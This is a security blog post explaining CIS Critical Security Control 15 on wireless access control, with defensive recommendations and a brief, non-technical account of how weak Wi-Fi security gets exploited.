Breaking Down The Critical Security Controls: CSC – 15 Wireless Access Control3 min read
You network is a collection of wires, wall ports, switches, routers, firewalls and miles of cables to connect in. At least it used to be that way. In the ‘old’ days the only way to get access to a local network with a physical device was to take a cable and plug in. Which means you had to be on premise and near a live/hot port. Those days are over in the world of wireless. As companies get more internally mobile, conference room gatherings with 20 people, it’s not feasible to have 20 cables laying around for everyone to plug into. Since people no longer want to take meeting notes on a piece of paper the laptop/table has become business critical.
In order to meet this new demand wireless access is the norm for companies. This also introduces a new security challenge. You no longer have direct control to where people can ‘plug in’. Wireless is anywhere in range including outside your offices to the outside world. That means new practices around access to your wireless access points. This is what CSC 15 covers, Wireless Access Control.
Here’s what the control says –
The processes and tools used to track, control, prevent and correct the security use of wireless local area networks (LANs), access points and wireless client systems.
The control is fairly straight forward. Control your access.
There a many ways to reduce and control access to the wireless network. The best method is a multi-step approach.
- Do not broadcast your SSID of the access points. Not fool proof but effective.
- In your corporate builds, see CSC 3, setup the wireless connection configuration and manage it administratively. Don’t allow users to manually connect.
- Use TLS certificates, no certificate, no access. This also removes the threat of false access points being setup with the same name.
- Use advanced authentication. Don’t use a simple, static WPA2 passphrase. Force directory authentication with a user’s account information for access. Then you can allow who can connect and easily sever the access.
- Limit the broadcast strength. Some routers are very powerful, go outside your building(s) and see how far away you can cannot, limit the power to get it close to the facility as you can.
- Segment the wireless access to the network. Do not allow vendors, visitors or personal devices to connect to the corporate wireless access points. Create an isolated, bandwidth limited network that does not have access to any critical areas.
- Review, monitor, analyze. See who and what are connecting along with the rest of your network.
How It Could Be Exploited
The simplest exploitation is a guy sitting in a car in your parking lot scanning the wireless traffic. Hacking 101 teaches hackers to look for an exploit poor wireless security. It takes a few minutes to capture what is needed and the rest of the cracking can be done in another location to get your keys. Most hacking it’s busting through the walls but looking for legitimate accounts and access codes to get access directly. A poor or weak wireless security on the access point is all they need. Once on the network they can get to work.
Unlike external facing applications that are containerized and limited to what it has access to, a breach on the wireless access point can give a criminal access to everything they can ping. Unless you have advanced authentication and monitoring in place someone could drop off a Raspberry Pie device for a day or two, connected to your network, and bang away on every IP and port looking for vulnerabilities, missing patches, exploits and reporting back to a control center.
This is a very common method. This is why you should never connect to a coffee shop WiFi unless you are using a VPN to protect your traffic. Even then you can get caught by a man in the middle up front.
Wireless access is convenient and a common if not mandatory piece of network equipment. Their protection and security focus should be a step up from your overall network because you never know where someone is connecting from. There are no cables to follow.
End of Line.
Binary Blogger has spent 20 years in the Information Security space currently providing security solutions and evangelism to clients. From early web application programming, system administration, senior management to enterprise consulting I provide practical security analysis and solutions to help companies and individuals figure out HOW to be secure every day.
Follow Me On Twitter